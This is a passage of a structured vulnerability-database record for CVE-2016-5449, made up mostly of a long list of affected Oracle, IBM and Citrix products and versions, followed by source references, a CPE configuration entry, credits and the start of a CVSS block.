version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003877", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, ], trust: 0.6, }, cve: "CVE-2016-5449", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
